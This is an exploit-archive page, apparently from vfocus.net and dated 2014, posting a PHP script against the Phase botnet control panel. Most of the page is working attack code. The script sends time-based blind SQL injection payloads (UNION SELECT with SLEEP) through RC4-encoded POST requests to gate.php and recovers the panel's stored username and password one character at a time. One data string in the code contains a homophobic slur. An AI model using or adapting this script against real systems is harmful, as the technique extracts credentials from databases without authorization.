首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Phase botnet blind SQL injection vulnerability
来源:vfocus.net 作者:Xylitol 发布时间:2014-12-24  
<?php
        // Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
        // Start with PHP CLI (php pwn.php)
        set_time_limit(0);
          
        // Adjust this :)
        define('SLEEP_TIME', '4');
        define('PAGE_TIME',  4);
        define('URL',        'http://localhost/Phase/');
          
        echo('attacking ' . URL . PHP_EOL);
          
        get_string('username');
        get_string('password');
          
        function get_length($field) {
                $length = 1;
                  
                while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
                        ++$length;
                }
                  
                echo($field . ' length: ' . $length . PHP_EOL);
                  
                return $length;
        }
          
        function get_string($field) {
                $length = get_length($field);
                $str    = '';
                  
                for ($i = 0; $i < $length; ++$i) {
                        $str .= chr(get_char($field, $i));
                        echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
                }
                  
                return $str;
        }
          
        function get_char($field, $id) {
                $binary = '';
                  
                for ($i = 1; $i < 256; $i *= 2) {
                        if ($i == 128)
                                $binary = '0' . $binary;
                        else
                                $binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
                }
                  
                return bindec($binary);
        }
          
        function is_true($query) {
                $rc4_key   = 'aaaa'; // b d u
                $data      = 'u=tapz&d=faggot&b=lol';
                $encode    = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
                $encode    = $rc4_key . $encode;
                $injection = urlencode($query);
                $req       = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
                  
                return !($req['time'] < PAGE_TIME);
        }
          
        function post_request($url, $data) {
        $handle = curl_init($url);
          
        curl_setopt($handle, CURLOPT_HEADER,         false);
        curl_setopt($handle, CURLOPT_USERAGENT,      'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
        curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($handle, CURLOPT_POST,           true);
        curl_setopt($handle, CURLOPT_POSTFIELDS,     $data);
                curl_setopt($handle, CURLOPT_TIMEOUT,        30);
          
                $time = microtime(true);
        $page = curl_exec($handle);
        $time = microtime(true) - $time;
                  
        curl_close($handle);
                  
        return array(
                        'page' => $page,
                        'time' => $time
                );
    }
          
        function rc4($pwd, $data, $data_length, $pwd_length){
                $key[] = '';
                $box[] = '';
                $cipher = '';
  
                for ($i = 0; $i < 256; $i++)
                {
                        $key[$i] = ord($pwd[$i % $pwd_length]);
                        $box[$i] = $i;
                }
                for ($j = $i = 0; $i < 256; $i++)
                {
                        $j = ($j + $box[$i] + $key[$i]) % 256;
                        $tmp = $box[$i];
                        $box[$i] = $box[$j];
                        $box[$j] = $tmp;
                }
                for ($a = $j = $i = 0; $i < $data_length; $i++)
                {
                        $a = ($a + 1) % 256;
                        $j = ($j + $box[$a]) % 256;
                        $tmp = $box[$a];
                        $box[$a] = $box[$j];
                        $box[$j] = $tmp;
                        $k = $box[(($box[$a] + $box[$j]) % 256)];
                        $cipher .= chr(ord($data[$i]) ^ $k);
                }
                return $cipher;
        }
  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GParted 0.14.1 - OS Command Ex
·AMSI 3.20.47 Build 37 File Dis
·jetAudio 8.1.3 Basic (mp3) - C
·WordPress Themes download.php
·NotePad++ v6.6.9 Buffer Overfl
·WhatsApp <= 2.11.476 - Remote
·Lotus Mail Encryption Server (
·jetAudio 8.1.3.2200 Crash Proo
·Varnish Cache CLI Interface Re
·Maxthon Browser Address Bar Sp
·Ettercap 0.8.0-0.8.1 - Multipl
·Desktop Linux Password Stealer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved